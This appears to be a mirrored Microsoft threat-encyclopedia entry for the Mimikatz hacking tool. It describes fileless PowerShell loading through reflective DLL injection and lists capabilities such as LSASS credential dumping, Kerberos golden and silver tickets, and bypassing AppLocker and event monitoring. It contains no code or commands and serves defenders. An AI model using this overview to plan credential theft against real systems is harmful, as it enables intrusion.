Home / malwarePDF  

Hacktool:Win32/Mimikatz


First posted on 24 June 2016.
Source: Microsoft

Aliases :

There are no other names known for Hacktool:Win32/Mimikatz.

Explanation :

Installation

A special PowerShell script (Invoke-Mimikatz.ps1) allows PowerShell to perform remote fileless execution of this threat. In essence, fileless execution enables loading of a binary into process space without touching the hard disk. When a fileless binary is loaded directly into memory, it remains invisible for file scanning antivirus solutions.

In a typical credential harvesting scenario, a malicious hacker can run a PowerShell command to trick the victim's machine to download the script from a malicious server.

Next, the downloaded script uses reflective DLL injection to load and run the threat remotely without storing any files on the disk of the compromised machine.

As a result of this, the malicious hacker can remotely leverage the threat to execute malicious activity like stealing credentials, certificates, and collecting data from the compromised host.

Payload

This threat can:

  • Recover and export Windows passwords in clear-text by injecting a DLL into lsass.exe
  • Export security certificates
  • Fileless execution through PowerShell
  • Inject DLLs into running processes
  • List running system and user processes
  • Obtain all process tokens
  • Impersonate a token
  • Get a list with loaded kernel drivers
  • Get a table with all service calls and corresponding kernel modules names
  • Retrieve data about all callback modules that receive notifications for processes, images, threads, registry changes, objects, and file changes
  • BSOD the machine
  • Modify privileges
  • Bypass some Group Policy settings
  • Disable some security and event monitoring services
  • Bypass Microsoft AppLocker / Software Restriction Polices
  • Gather critical data for security and instrumentation software running on the host




Recover and export Windows credentials

This threat can dump credentials from LSASS (Windows Local Security Account database) including:
  • NT Lan Manager (NTLM) password hashes
  • LAN Manager password hashes
  • Kerberos password, ekeys, tickets, and PIN
  • TsPkg (password)
  • WDigest (clear-text password)
  • LiveSSP (clear-text password)
  • SSP (clear-text password)
  • DPAPI hashes and keys


It can also:
  • Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack)
  • Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack)
  • Export certificates and keys
  • Dump cached credentials
  • Stop event monitoring
  • Patch Terminal Server
  • Bypass basic Group Policy Objects

Last update 24 June 2016

 

TOP

Malware :